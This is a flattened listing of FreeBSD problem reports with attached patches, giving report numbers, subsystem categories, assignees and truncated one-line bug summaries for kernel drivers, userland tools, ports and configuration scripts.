thompsa [ndis] [patch] if_ndis - fix a scanning problem of Mar o bin/118355 pf [pf] [patch] pfctl(8) help message options order false o bin/118325 rc [patch] [request] new periodic script to test statuses o kern/118320 fs [zfs] [patch] NFS SETATTR sometimes fails to set file o kern/118317 [zlib] [patch] Incorrect gzeof() return value in zlib o bin/118297 weongyo [patch] ndiscvt(8): sort a output format. o bin/118296 weongyo [patch] ndiscvt(8) can't parse a STRING WORD pattern w o bin/118295 weongyo [patch] ndiscvt(8) makes a syntax error when it proces o bin/118294 weongyo [patch] ndiscvt(8) can't parse WORD which includes '(' a kern/118238 net [bce] [patch] bce driver shows "no carrier" on Intel S o kern/118222 [pxeboot] [patch] FreeBSD 7.0 PXE + NFS / "Can't work o bin/118205 [patch] [request] new options -r to pkill(1) a pid aft o ports/118168 multimedia [patch] multimedia/transcode - Add WITHOUT_X11 and WIT o bin/118144 des [patch] pam_lastlog doesn't check return values in pam o usb/118140 usb [ucom] [patch] quick hack for ucom to get it behave wi o bin/118132 [patch] pax(1): broken -s handling of \1, \2 ... o bin/118123 [patch] chat(8) has infinite recursion bug o bin/118114 [patch] update manctl(8) o conf/118111 [patch] [request] Add MAC address based interface rena o bin/118069 thomas [patch] camcontrol(8) should be able to leave device s o bin/118014 remko [patch] arp(8): Minor style(9) change to src/usr.sbin/ o usb/117938 usb [ums] [patch] Adding support for MS WL Natural and MS o conf/117935 rc [patch] ppp fails to start at boot because of missing s bin/117830 [patch] who(1) no longer displays entries for folk log f bin/117751 [patch] [request] Make pw(8) support "-d" argument o bin/117733 [patch] [request] allow to tee(1) to sockets, descript o kern/117709 simon [libcrypto] [patch] Base openssl does not define OPENS o bin/117687 [patch] fstab(5) format cannot handle spaces f bin/117603 linimon [patch] dump(8) hangs on SMP - 4way and higher. o usb/117598 usb [uaudio] [patch] Not possible to record with Plantroni p conf/117555 dougb [patch] [nis] NIS-dependent services cannot start if y o usb/117546 remko [uftdi] [patch] Add MaxStream ZigBee product ID to uft o bin/117520 mux [patch] csup(1) not-really-equivalent to cvsup p kern/117512 des [libpam] [patch] document .opieaccess for pam_opieacce o kern/117510 [headers] [patch] sys/cdefs.h lacks support for PCC o bin/117452 [patch] tftp(1): the fix for PR 103206 was incorrect o bin/117339 net [patch] route(8): loading routing management commands o docs/117308 gavin [patch] Clarification of /etc/defaults/devfs.rules sta o bin/117277 des [patch] fetch(1): fetch's resume mode doesn't verify t o kern/117234 ipfw [ipfw] [patch] ipfw send_pkt() and ipfw_tick() don't s o usb/117205 remko [uscanner] [patch] uscanner support for HP ScanJet 447 o bin/117191 [patch] OptionalObsoleteFiles.inc - Add files to remov p usb/117185 thompsa [umodem] [patch] Add support for UNION interface descr o bin/117093 kensmith [patch] [request] Teach sysinstall(8) to load config f p ports/116984 apache [patch] www/apache13-modssl missing perl5.8 as RUN_DEP o bin/116980 fs [msdosfs] [patch] mount_msdosfs(8) resets some flags f o usb/116947 usb [ukbd] [patch] [regression] enable boot protocol on th p kern/116896 geom [geom] [patch] Typo in a kassert in GEOM o kern/116837 net [tun] [panic] [patch] ifconfig tunX destroy: panic o stand/116826 standards [patch] sh support for POSIX character classes a kern/116697 kmacy [net] [patch] ifconfig's name argument has no effect o o bin/116643 net [patch] [request] fstat(1): add INET/INET6 socket deta p kern/116608 fs [msdosfs] [patch] msdosfs fails to check mount options f ports/116601 portmgr [patch] bsd.port.mk - fail if dependency failed o bin/116425 [patch] [request] ls(1) options for pre-sort of direct o conf/116416 mtm [patch] [request] per-jail rc.conf(5) style configurat o conf/116237 [patch] ugly output of the 405.status-ata-raid if fdes o ports/116219 edwin [patch] Add @rmtry to bsd.port.mk o bin/116209 [patch] [request] decimal suffix in split(1) o conf/116071 [patch] loader.conf update some variables o kern/116009 ipfw [ipfw] [patch] Ignore errors when loading ruleset from o bin/115960 des sshd's X11 forwarding broken on IPv6 only machine [pat o bin/115946 des [libpam] [patch] not thread-safe o usb/115935 usb [usbdevs] [patch] kernel counterproductively attaches o usb/115933 usb [uftdi] [patch] RATOC REX-USB60F (usb serial converter p kern/115755 ipfw [ipfw] [patch] unify message and add a rule number whe o kern/115631 [libc] [patch] [request] make dlclose(3) atexit-aware a kern/115623 imp [cardbus] [patch] Xircom CardBus Ethernet II 10/100 Ad o amd64/115581 amd64 [Makefile] [patch] -mfancy-math-387 has no effect o kern/115547 geom [geom] [patch] [request] let GEOM Eli get password fro o bin/115486 [patch] [request] newsyslog(8) -- provide ability to c o ports/115461 pgollucci [patch] bsd.apache.mk - Create packages for apache mod o bin/115447 harti [patch] [request] teach make(1) to respect TMPDIR envi o bin/115431 [patch] [request] improvement to split(1): add -B swit o bin/115406 [patch] gpt(8) GPT MBR hangs award BIOS on boot o kern/115371 imp [cardbus] [patch] Device removal leaves resource datab o kern/115196 bushman [libc] [patch] [request] Implement getgroupmembership( o bin/115174 [patch] growfs(8) needs zero-writing for safe filesyst o bin/115172 ipfw [patch] ipfw(8) list show some rules with a wrong form o kern/115164 des [libpam] [patch] [request] Add support for the account o kern/115162 des [libpam] [patch] [request] Add check for target user's o kern/115133 scottl [mpt] [mfi] [patch] Patches to make mfi support LSI SA o docs/115065 doc [patch] sync ps.1 with p_flag and keywords p misc/115025 edwin [tools] [patch] new flash device for nanobsd's FlashDe o kern/114955 fs [cd9660] [patch] [request] support for mask,dirmask,ui o usb/114916 usb [umass] [patch] USB Maxtor drive (L300RO) requires qui o kern/114915 net [patch] [pcn] pcn (sys/pci/if_pcn.c) ethernet driver f o kern/114847 fs [ntfs] [patch] [request] dirmask support for NTFS ala o kern/114714 thompsa [gre] [patch] gre(4) is not MPSAFE and does not suppor p kern/114646 firewire [firewire] [patch] firewire fails after suspend/resume o kern/114492 [kernel] [patch] device_attach() doesn't unset devclas o bin/114468 fs [patch] [request] add -d option to umount(8) to detach o bin/114465 [patch] [request] script(1): add really cool -d, -p & o kern/114451 [nfs] [patch] prevent NFS server possible crash o docs/114371 doc [patch] [ip6] rtadvd.con(5) should show how to adverti f kern/114331 vanhu [crypto] [patch] VIA padlock freesession bug o usb/114310 usb [libusb] [patch] [panic] USB hub attachment panics ker o kern/114291 kmacy [RFE] [modules] [patch] add dynamic module references o ports/114231 edwin [patch] multimedia/audacious-plugins - audacious/plugi f ports/114229 nork [patch] [www/linuxpluginwrapper] libmap.conf-FreeBSD6 o docs/114184 doc [patch] [ndis]: add info to man 4 ndis o ports/114167 portmgr [patch] bsd.port.mk - ignoring major numbers in LIB_DE o bin/114129 mux [patch] csup(1) doesn't support authentication p conf/114101 se [patch] Add ZFS to periodic locate run o bin/114081 bz [patch] [ppp] ppp(8) should be able to set ethernet ad o usb/114068 usb [umass] [patch] Problems with connection of the umass o bin/114059 [patch] shutdown(8) should fall back to exec reboot/ha o conf/114013 usb [patch] WITHOUT_USB allow to compil a lot of USB stuff o bin/113979 matteo [patch] sysinstall(8) does not support UFS1 filesystem s kern/113950 multimedia [sound] [patch] [request] add per-vchan mixer support o conf/113915 rc [patch] ndis wireless driver fails to associate when i o conf/113913 [patch] [requst] new file /etc/periodic/daily/490.stat o kern/113885 geom [gmirror] [patch] improved gmirror balance algorithm o bin/113881 [patch] sysctl(8): Wrong memory usage o kern/113856 [patch] [plip] PLIP (parallel port IP) dead on 6.2, de o kern/113849 [libdisk] [patch] Correction of Sanitize_Bios_Geom for o bin/113838 fs [patch] [request] mount(8): add support for relative p o bin/113825 [patch] [libc] [ggated] Fix -STABLE build with -fno-st o docs/113803 ipfw [patch] ipfw(8) - don't get bitten by the fwd rule o bin/113702 krion [patch] bad output from "pkginfo -g" o bin/113682 [patch] sysinstall(8) warns for invalid geometry which o bin/113518 [patch] make(1): Prevent execution when command is a c o bin/113398 [libc] [patch] initgroups fails rather than truncates p kern/113388 ipfw [ipfw] [patch] Addition actions with rules within spec o gnu/113343 [patch] grep(1) outputs NOT-matched lines (with multi- p kern/113266 harti [libgssapi] [patch] Missing handling of mech_type in g o conf/113265 [patch] Add registered epmd port number to etc/service o bin/113239 [patch] atrun(8) loses jobs due to race condition o bin/113230 des [pam] [patch] const-ify PAM-headers o docs/113194 doc [patch] [request] crontab.5: handling of day-in-month o i386/113110 i386 [mk] [patch] i686 is not an alias of pentiumpro on GCC f ports/113099 tmclaugh [PATCH] sysutils/libchk may skip $X11BASE now o ports/113096 edwin [patch] x11/xorg - X.org manpages broken o bin/113074 [patch] ppp(8): include for strcasecmp(3) a usb/113060 usb [usbdevs] [patch] Samsung printer not working in bidir o bin/113049 fs [patch] [request] make quot(8) use getopt(3) and show o conf/112997 [patch] Add note about the 'native' mtune option to sh p bin/112955 des [patch] login(1): add netgroup support back to pam_log o usb/112944 usb [ulpt] [patch] Bi-directional access to HP LaserJet 10 o kern/112938 [headers] [patch] utmp.h is too limiting for modern sy p docs/112935 remko [patch] newfs_msdos(8): document 4.3g limit on files w o bin/112794 [patch] [request] pam_exec(8): allow pam_exec to expor o kern/112775 [libmd] [patch] libmd(3) bug for some zero-length file a bin/112694 [patch] segfault in pam_lastlog(8) on sshd exit when n o bin/112673 [patch] pkg_add(1): pkg_add -S leaks the temp dir o kern/112658 fs [smbfs] [patch] smbfs and caching problems (resolves b o conf/112558 [patch] /etc/periodic/daily/200.backup-passwd poor han o bin/112557 net [patch] ppp(8) lock file should not use symlink name o bin/112556 [patch]: sysctl(8) needs to fix multi-lineal descripti p kern/112554 silby [kernel] [patch] unp_gc is overly agressive and remove s kern/112544 acpi [acpi] [patch] Add High Precision Event Timer Driver f o kern/112477 marius [ofw] [patch] Add support to set the node and type on o bin/112379 [patch] [request] lockf(1): on closing stdin, stdout, p ports/112347 obrien [PATCH] editors/vim re-enable WITH_TCL o bin/112336 [patch] install(1): install -S (safe copy) with -C or s gnu/112215 obrien [patch] gcc(1): "gcc -m32" attempts to link against 64 o bin/112213 [patch] touch(1)ing a directory and failing yields ret f kern/111990 [pccbb] [patch] system freeze in initialization proces o bin/111978 [patch] [request] make syspath list for mount(8) confi o kern/111537 kmacy [inet6] [patch] ip6_input() treats mbuf cluster wrong o bin/111493 [patch] routed(8) doesn't use multicasts for RIPv2 via o power/111296 ppc [kernel] [patch] [request] Support IMISS, DLMISS an DS o bin/111226 [patch] Incorrect usage of chflags() in various FreeBS o bin/111024 [request] [patch] atacontrol(8): support for stand-by p kern/111023 mav [ata] [request] [patch] please expand ata timeouts o kern/110995 kmacy [loader] [patch] loader wastes space worth symtab size o conf/110993 [patch] /etc/netstart should start rpcbind o bin/110887 [patch] truss(1) missing linux_access syscall descript o usb/110856 usb [ugen] [patch] interrupt in msgs are truncated when bu f kern/110720 kmacy [net] [patch] [request] support for interface descript o ports/110533 olgeni [patch] WITHOUT_NLS support for www/neon and www/sitec o kern/110392 scottl [hptmv] [patch] hptmv very old and missing important f o docs/110376 doc [patch] add some more explanations for the iwi/ipw fir o kern/110284 kmacy [if_ethersubr] [patch] Invalid Assumption in SIOCSIFAD o docs/110253 doc [patch] rtprio(1): remove processing starvation commen o kern/110249 kmacy [kernel] [regression] [patch] setsockopt() error regre o kern/110199 jmg [kqueue] [patch] kqueue_register doesn't update the kn o bin/110146 [patch] [request] Allow arbitrary gdb(1) options to by o bin/110068 [patch] rewrite of mdmfs(8) in shell o docs/110062 doc [patch] mount_nfs(8) fails to mention a failure condit o docs/110061 doc [patch] tuning(7) missing reference to vfs.read_max o kern/110017 [libexec] [patch] serial port console output garbled p amd64/109584 edwin [patch] zdump(8) doesn't work a ports/109580 glewis [patch] math/gnuplot does not include bsd.emacs.mk whe o conf/109562 rc [rc.d] [patch] [request] Make rc.d/devfs usable from c o bin/109521 [patch] chio(1): 'chio return' breaks on non-voltag ch o ports/109501 krion [PATCH] add some configurable vars to mail/exim o bin/109478 [libc] [patch] adopt reentrant syslog functions from O a kern/109477 yongari [vr] [patch] onboard via vt6103 ethernet does not work o kern/109416 des [libpam] [patch] pam_group doesn't check login_group m o bin/109413 jhb [patch] top(1) shows at least 50% idle when hyperthrea o kern/109277 [pppd] [patch] : kernel ppp(4) botches clist reservati o kern/109251 net [re] [patch] if_re cardbus card won't attach o kern/109232 imp [sio] [patch] ibufsize calculation wrong causing data o docs/109008 csjp [patch] add summary of kern/48198 to jexec(8) s bin/108743 vwe [patch] who(1): IPv6 addresses truncated to maximum IP o bin/108656 [patch] Segfault of sshd(8) for unknown user when priv p bin/108523 trhodes [patch] daemon(8): support for dropping privileges p stand/108390 kib [kernel] [patch] wait4() erroneously waits for all chi p bin/108368 [patch] tip(1) coredumped when 'du' capability is used o kern/108133 jmg [bktr] [patch] bktr driver doesn't recognize Hauppauge o kern/107944 net [wi] [patch] Forget to unlock mutex-locks o usb/107924 usb [patch] usbd(8) does not call detach o ports/107816 roam [patch] The IPv6 patch breaks the location feature of o kern/107707 geom [geom] [patch] [request] add new class geom_xbox360 to p stand/107561 standards [libc] [patch] [request] Missing SUS function tcgetsid o bin/107515 [patch] ls(1) bug o usb/107388 usb [new driver] [patch] add utoppy device from NetBSD o usb/107248 usb [umass] [patch] scsi_da.c quirk for Cowon iAUDIO X5 MP o usb/107243 usb [cam] [patch] Apacer USB Flash Drive quirk o bin/107171 [patch] [ncurses] systat(1) doesn't die when it's xter o conf/107035 net [patch] bridge(8): bridge interface given in rc.conf n o bin/106872 [patch] [request] extattr support for find(1) o usb/106861 usb [usbdevs] [patch]: usbdevs update: Add product ACER Ze s ports/106848 portmgr [PATCH] Mk/bsd.port.mk -- Add support to remove locale o bin/106734 [patch] [request] bzip2(1): SSE2 optimization for bzip o kern/106722 glebius [net] [patch] ifconfig may not connect an interface to o kern/106646 [nfs] [patch] Pointer incorrectly cast to ulong o kern/106645 [uart] [patch] uart device description in 7-CURRENT is o usb/106621 usb [axe] [patch] DLINK DUB-E100 support broken o i386/106493 ru [patch] pxeboot(8) uses /pxeroot instead of / o ports/106483 portmgr [patch] embed distfile information in +CONTENTS o bin/106431 [patch] atacontrol(8): Inform user of ata RAID5 acting o kern/106255 trhodes [msdosfs] [patch]: correct setting of archive flag p bin/106049 [patch] tftpd(8) - improve -w option to support unique o conf/106009 rc [ppp] [patch] [request] Fix pppoed startup script to p o bin/105614 [patch] setkey(8): Creating NULL encryption ESP SAs wi o kern/105604 [bktr] [patch] add support for Pixelview PlayTV Pro 2 o conf/105568 rc [patch] [request] Add more flexibility to rc.conf, to o docs/105456 keramida [patch] overhaul of the security chapter (14) o bin/105341 [libpam] [patch] [request] pam_krb5: Add minimum_uid/m o www/105333 www [patch] Base selection in events in libcommon.xsl does o kern/105330 ipfw [ipfw] [patch] ipfw (dummynet) does not allow to set q o conf/105145 rc [ppp] [patch] [request] add redial function to rc.d/pp f conf/105100 ache [patch] [locale] no support for lv (latvian) locale o kern/105093 fs [ext2fs] [patch] ext2fs on read-only media cannot be m o bin/104921 ipfw [patch] ipfw(8) sometimes treats ipv6 input as ipv4 (a o kern/104882 [iicbb] [patch] pvr250 and pvrxxx drivers need iicbb p o kern/104851 net [inet6] [patch] On link routes not configured when usi o bin/104746 [patch] traceroute(8): 'traceroute -e -P TCP' cannot w o stand/104743 standards [headers] [patch] Wrong values for _POSIX_ minimal lim o kern/104738 mlaier [inet] [patch] Reentrant problem with inet_ntoa in the o bin/104731 gad [patch] missing newline in lpq(1) output s bin/104689 matteo [patch] [request] powerd(8): add support for limiting o kern/104682 ipfw [ipfw] [patch] Some minor language consistency fixes a o bin/104553 [patch] [request] Add login group support to login.acc o conf/104549 rc [patch] rc.d/nfsd needs special _find_processes functi o gnu/104533 bugmeister [patch] [request] make send-pr(1) read configuration f o docs/104493 roberto [patch] Wrong description in ntp.conf(5) (CURRENT and o kern/104389 geom [geom] [patch] sys/geom/geom_dump.c doesn't encode XML o usb/104352 usb [ural] [patch] ural driver doesnt work o usb/104290 usb [umass] [patch] quirk: TOSHIBA DVD-RAM drive (libretto p kern/104212 [puc] [patch] support for Kuroutoshikou SERIAL4P-LPPCI o bin/104092 [patch] iostat(8): missing blanks in iostat output o kern/104079 [fdc] [patch] kldunload fdc.ko leads to panic: mutex G o kern/103862 [fdc] [patch] Error with fdformat on -CURRENT o kern/103764 [libradius] [patch] libradius aborts server processing o bin/103682 [patch] [request] nfsstat(1) should use %u instead of o kern/103615 emaste [aac] [patch] aac(4) update to the last version availa p conf/103489 bz [rc.d] [named] [jail] [patch] named_chroot_autoupdate o kern/103454 ipfw [ipfw] [patch] [request] add a facility to modify DF b o usb/103418 usb usbhidctl(1): [patch] [request] usbhidctl: add ability o usb/103046 usb [ulpt] [patch] ulpt event driven I/O with select(2) an p kern/102956 dchagin [linux] [patch] Add partial support for SO_PEERCRED in o ports/102946 secteam [patch] ports-mgmt/portaudit a bin/102834 [patch] mail(1) hangs on the sigsuspend system call in o bin/102793 edwin [patch] [request] top(1): display feature of current C o docs/102719 doc [patch] ng_bpf(4) example leads to unneeded promiscuos o conf/102700 rc [geli] [patch] Add encrypted /tmp support to GELI/GBDE o bin/102638 matteo [patch] sysinstall(8): custom dist set always install o bin/102609 [patch] Add filtering capability to date(1) o kern/102549 [bktr] [patch] fix Pixelview PlayTV Pro 2 on bktr o kern/102540 [netgraph] [patch] supporting vlan(4) by ng_fec(4) o conf/102502 net [netgraph] [patch] ifconfig name does't rename netgrap o kern/102471 ipfw [ipfw] [patch] add tos and dscp support o bin/102394 [patch] ls(1) do not shows inode number symbolic link o kern/102390 [pppd] [patch] kernel pppd don't using pam o bin/102357 [patch] tcsh(1)/csh(1) jobs control: sometimes 'fg' co o bin/102299 [patch] grep(1) malloc abuse? o kern/102211 [ar] [patch] detach raid member and reboot will cause o bin/102162 [patch] tftpd(8): Limit port range for tftpd o kern/101819 [ar] [patch] ata driver wrongly determines type RAID o o usb/101775 usb [libusbhid] [patch] possible error in report descripto o usb/101761 usb [usb] [patch] [request] usb.h: increase maximal size o o threa/101323 threads [patch] fork(2) in threaded programs broken. o kern/101274 yongari [sk] [patch] SysKonnect Yukon initialization bug on K8 p kern/101228 edwin [nanobsd] [patch] Two more entries for FlashDevice.sub o bin/100956 remko [patch] support setting carp device state with ifconfi o bin/100921 [patch] tftpd(8): libexec/tftpd: `-w' non-traditional o bin/100914 [patch] tftpd(8): libexec/tftpd: write access control o docs/100803 jhb [patch] the man page about ithread is expired. o conf/100782 [keyboard] [patch] Default keymap to support ALT+Left, o conf/100616 [patch] syslog.conf: lines after exclamation point ign o bin/100535 [patch] cal(1) and ncal(1) do not take into account mu o ports/100504 skv [PATCH] databases/p5-Class-DBI: Reduce dependencies a bin/100496 [patch] Fix to get rid of the telnet(1) to cisco probl o bin/100424 [patch] ssh(1): SSH option BindAddress is ignored by o o misc/100322 [tools] [patch] kerninclude.sh doesn't dump object nam o i386/100142 i386 [pci] [patch] /dev/smb0 device not available on system a bin/100089 [patch] ftp(1): default ftp application of FreeBSD giv o bin/100018 [patch] newsyslog(8) does not check size if time_at is o stand/100017 standards [Patch] Add fuser(1) functionality to fstat(1) o kern/99979 [patch] Get Ready for Kernel Module in C++ o bin/99896 gad [patch] lpr(1): lpr -r flag has no effect o kern/99800 [libc] [patch] Add support for profiling multiple exec o kern/99758 [pty] [patch] chown/chmod pty slave side in kernel o conf/99721 rc [patch] /etc/rc.initdiskless problem copy dotfile in s o misc/99627 [build] [patch] make update & CVSROOT o bin/99566 jail [jail] [patch] fstat(1) according to specified jid o conf/99444 rc [patch] Enhancement: rc.subr could easily support star o conf/99328 linimon [patch] updates for src/share/examples/cvsup o bin/99307 [patch] mount_nfs(8) incompatible with zVM VMNFS 3A0 o bin/99217 [patch] pam_ssh(8) waits for a wrong ssh-agent PID at o kern/99188 andre [tcp] [patch] FIN in same packet as duplicate ACK is l o gnu/99173 [patch] replace gnu patch with a bsd-licensed one. f kern/99068 [linux] [patch] Linux emulator crashed by java, when c o kern/99017 [ata] [patch] FreeBSD versions above 5.3 panic if atap o kern/98978 net [ipf] [patch] ipfilter drops OOW packets under 6.1-Rel o kern/98962 remko [ata] [burncd]: [patch] writing >1 session on ATAPI CD o i386/98932 i386 [i386] [patch] Kernel compilation failed on specific P o kern/98788 [syscons] [patch] Add sysctl to disallow VT_LOCKSWITCH o docs/98759 doc [patch] sbp_targ(4) man page missing reference to devi o bin/98577 [patch] dhclient(8): the link check by dhclient slows o kern/98460 [kernel] [patch] fpu_clean_state() cannot be disabled f docs/98344 linimon [patch] An update of the article "Choosing the FreeBSD o kern/98167 multimedia [sound] [es137x] [patch] ES1370 mixer volumes incorrec o kern/98091 scottl [mfi] [patch] Makefile style of mfi kernel module brok p kern/98015 remko [bfe] [patch] bfe(4): double free in error handling pa o kern/97951 ipfw [ipfw] [patch] ipfw does not tie interface details to p conf/97697 matteo [patch] rc.conf - jail__exec_afterstart[0..n] o usb/97472 usb [cam] [patch] add support for Olympus C150,D390 o kern/97381 [fdc] [patch] Patch to add zero-sector and spanned-sid o kern/97377 fs [ntfs] [patch] syntax cleanup for ntfs_ihash.c o kern/97329 [nfs] [patch] code simplification o kern/97153 [patch] When -NO_KERBEROS is set, libcom_err still get o bin/97083 [patch] passwd(1) does not support _PWF_HESIOD o bin/97002 [patch] cron(8) fails quietly if /usr/sbin/sendmail is o kern/97000 [kernel] [patch] bogus "All threads purged from ugen0. o kern/96999 [procfs] [patch] procfs reports incorrect information o kern/96974 obrien [patch] to build FreeBSD kernel with binutils 2.16.92 o bin/96854 imp [patch] devd(8) parses events incorrectly in some case a bin/96840 [libc] [patch] getgrent() does not return large groups o conf/96746 [nanobsd] [patch] Configuration changes and README for f kern/96743 yongari [sk] [patch] broken 32-bit register operations o bin/96540 [patch] catman(1) does not deal correctly with hard-li o kern/96429 [kernel] [patch] kern_linker.c hardcodes "/boot/kernel f kern/96393 [libz] [patch] assembler implementations for libz on i o usb/96381 usb [cam] [patch] add a quirk table entry for a flash ram o kern/96346 [modules] [patch] disable build of modules that are al o conf/96343 rc [patch] rc.d order change to start inet6 before pf o conf/96247 matteo [patch] 550.ipfwlimit reports logs even if log size is o stand/96236 standards [patch] [posix] sed(1) incorrectly describes a functio o kern/96030 net [bfe] [patch] Install hangs with Broadcomm 440x NIC in f bin/95979 obrien [patch] burncd(8) fails to fixate CDs p bin/95715 [patch] random(6) busy loop under some conditions o bin/95698 philip [patch] moused(8): Software control of sysmouse o kern/95661 [pci] [patch] pci_pci still not correct for initializi o bin/95339 [libexec] [patch] rtld is thread-unsafe. fixes for dlo o kern/95277 net [netinet] [patch] IP Encapsulation mask_match() return o kern/95239 [libc] [patch] nftw(3) returns EINVAL for large values s ports/95085 portmgr [PATCH]: bsd.port.mk: Add knob to allow for mutually e o kern/95084 ipfw [ipfw] [regression] [patch] IPFW2 ignores "recv/xmit/v o bin/95082 [patch] ping(8) won't handle large preload patterns o bin/95079 [patch] apply(1) dies when there are two %1 in command s kern/94863 net [bge] [patch] hack to get bge(4) working on IBM e326m o kern/94830 [nfs] [patch] mount_nfs causes a fatal trap 18 if the o kern/94772 [fifo] [patch] FIFOs (named pipes) + select() == broke o ports/94690 ume [patch] Daemons in /usr/local/etc/rc.d/ must do "setss o kern/94669 pjd [vfs] [patch] Panic from Failed Removable Media Mount o docs/94625 doc [patch] growfs man page -- document "panic: not enough o bin/94546 [patch] Make telnet(1) accept 'host:port' on command l o kern/94519 [libc] [patch] Add UF_HIDDEN file flag; map it to Wind o www/94423 danger [patch] XML'ified release todo list o kern/94369 itetcu [bktr] [patch] Patch to support Leadtek WinFast Tv2000 o kern/94273 gnn [ipsec] [patch] IPIP decapsulation problem in FAST_IPS s ports/94138 portmgr [patch] Mk/bsd.gcc.mk, Mk/bsd.port.mk: CPUTYPE cause b o bin/94052 [patch] Adds option to script(1) to suppress carriage- o bin/94032 krion [patch] Enhancement to pkg_add(1) to add -4 flag to fo o kern/93998 [libstand] [patch] panic in libstand when closing raw o kern/93942 fs [vfs] [patch] panic: ufs_dirbad: bad dir (patch from D o usb/93872 usb [cam] [patch] SCSI quirk required for ELTA 8061 OL USB o bin/93857 [patch] new utility: kiconv_cs_preload(8): Utility for o conf/93815 rc [patch] Adds in the ability to save ipfw rules to rc.d o bin/93776 [crypto] [patch] SHA256_Update / SHA512_Update fail to o kern/93705 standards [headers] [patch] ENODATA and EGREGIOUS (for glibc com o docs/93683 chinsan [patch] some typos in klist(1) o misc/93661 [patch] loader(8): prevent *.4th files and friends fro o gnu/93566 [patch] sort(1): numeric sort is broken on multi-byte a ports/93560 roam [patch] dns/djbdns-ipv6: Update IPv6 patches o bin/93473 des [patch] Let pam_unix(8) use "passwordtime" from login. o usb/93389 usb [umass] [patch] Digital Camera Pentax S60 don't work o misc/93341 phk [nanobsd] [patch] make more flexibitily for NanoBSD cu o kern/93331 [kernel] [patch] broken asm in kernel o bin/93310 des [libpam] [patch] pam_unix ignores 'passwordtime' from o bin/93309 [rpc.quotad] [patch] rpc.rquotad: group quota support o gnu/93127 [patch] add __FreeBSD_kernel__ to pre-defines o kern/92880 net [libc] [patch] almost rewritten inet_network(3) functi o usb/92852 usb [ums] [patch] Vertical scroll not working properly on o kern/92786 [ata] [patch] ATA fixes, write support for LSI v3 RAID o kern/92675 yongari [fxp] [patch] fxp(4) unable to recover from occasional o conf/92523 rc [patch] allow rc scripts to kill process after a timeo s ports/92434 portmgr [patch] Mk/bsd.port.mk automatic show pkg-message o kern/92412 [libexec] [patch] rpc.rstatd reports bogus packets/per o stand/92362 standards [headers] [patch] Missing SIGPOLL in kernel headers o kern/92238 [ata] [patch] Spurious "atapci1: failed to enable memo o kern/92092 [iicbus] [patch] Panic if device with iicbus child is o kern/91954 [libpam] [patch] Proposed enhancement for pam_krb5: "o o i386/91871 i386 [boot1] [patch] boot1: jump to 0xf000:0xfff0 instead o s kern/91777 net [ipf] [patch] wrong behaviour with skip rule inside an o conf/91732 [patch] 800.loginfail: fix log message grep expression o usb/91546 usb [umodem] [patch] Nokia 6630 mobile phone does not work o usb/91538 usb [ulpt] [patch] Unable to print to EPSON CX3500 f kern/91476 gavin [fdc] [patch] floppy drive doesn't work in MS Virtual o kern/91414 emaste [kernel] [patch] Polling for devices other than NICs o kern/91347 rodrigc [pci] [patch] Add another PCI-e chipset for extended c o bin/91299 yar [patch] add ftpd(8) SITE SHA256 command p kern/91293 delphij [svr4] [patch] *Experimental* Update to the SVR4 emula o kern/91134 fs [smbfs] [patch] Preserve access and modification time o bin/91101 edwin [patch] whereis(1): make more readable o bin/91034 [patch] minor fix to iostat(8) so that columns line up o kern/90973 thompsa [net] [patch] if_bridge does not handle arp for own ad f conf/90863 dougb [patch] 6.0 boot: name resolution broken for daemon st a kern/90815 fs [smbfs] [patch] SMBFS with character conversions somet o bin/90687 avg [patch] side effect of -delete option of find(1) o bin/90680 [patch] make(1) thinks "^.for.o:" is a directive (".fo o ports/90436 portmgr [patch] Add a way to handle configuration files to bsd o bin/90384 [patch] chroot patch for sftp-server(8) o bin/90311 [patch] add "eject" to mt(1) a conf/90163 dougb [patch] Easily launch non-forking daemons like logsurf o bin/90130 [patch] sysctl(8): print temperature in celsius only w o bin/90114 [patch] pw(8) takes strings after option -g for GID 0 s bin/90082 matteo [syscons] [patch] curses ACS line graphics support for f kern/89989 bz [jail] [patch] Add option -I (ASCII 73) PID to specif o bin/89988 [patch] bootparamd(8) null host support and whoami fix o conf/89870 rc [patch] [request] make netif verbose rc.conf toggle o bin/89799 [patch] Making natd(8) not require a newline at the en o bin/89770 des [patch] pam_krb5 'authentication token failure' in pas o bin/89762 edwin [patch] top(1) startup is very slow on system with man f kern/89752 dwmalone [bpf] [patch] bpf_validate() needs to do more checks a kern/89660 geom [vinum] [patch] [panic] due to g_malloc returning null o kern/89553 [bktr] [patch] going from 5.3 -> 6.0 winTV card not pr o bin/89410 [patch] sh(1) missing \u interpolation and bug/fix in o bin/89326 [patch] Add pattern matching to login.access(5) p docs/89325 trhodes [patch] Clarification of kbdmap(5), atkbd(4) and kbdco s kern/89305 vwe [vr] [patch] D-Link NIC with VIA Rhine II, lost of Net o conf/89061 rc [patch] IPv6 6to4 auto-configuration enhancement o conf/88913 rc [patch] wrapper support for rc.subr o bin/88821 pjd [patch] IPv6 support for ggated(8) o bin/88780 [patch] Baseline ipmon(8) uses LOG_LOCAL0 syslog, not o bin/88655 [patch] tcsh(1): /bin/tcsh ls-F : Floating exception ( a bin/88538 [patch] tcsh(1) ls-F spacing incorrect. o docs/88512 doc [patch] mount_ext2fs(8) man page has no details on lar o kern/88336 vanhu [ipsec] [patch] setkey(8) -D fails to report all SAs o bin/88215 [patch] syslogd(8) does not pass cleanly parameters to o bin/88056 [patch] [request] cp(1) could really use Linux's -x op o kern/88045 jhb [nve] [patch] 6.0rc1: nve0: device timeout (51) o kern/87990 [kernel] [patch] SMP Race Condition in kdb_enter/kdb_e o bin/87966 [patch] newfs(8): introduce -A flag for newfs to enabl o conf/87925 [patch] [request] modify output of 405.status_ata_raid o bin/87792 [patch] very bad performance of cp(1) via NFS, possibl o kern/87729 phk [libc] [patch] most calls to malloc(3) generate warnin o bin/87651 [patch] fsck(8) (on superblock error) tells wrong man o kern/87506 net [vr] [patch] Fix alias support on vr interfaces s ports/87420 portmgr [patch] bsd.port.mk: implementing WITH_OPENLDAP_VER to o www/87119 hrs [patch] encode copyright and such symbolically o kern/87032 ipfw [ipfw] [patch] ipfw ioctl interface implementation o kern/86957 ipfw [ipfw] [patch] ipfw mac logging o kern/86944 [nfs] [patch] When I use FreeBSD with NFS client, clos o usb/86767 usb [umass] [patch] bogus "slice starts beyond end of the o bin/86635 pf [patch] pfctl(8): allow new page character (^L) in pf. o bin/86485 [patch] hexdump(1): hexdump -s speedup on /dev a stand/86484 standards [patch] mkfifo(1) uses wrong permissions o bin/86388 [patch] periodic(8) daily should backup bsdlabel(8) / o kern/86290 jeff [kernel] [patch] minor optimizations + cleanup to vrel o kern/85971 jeff 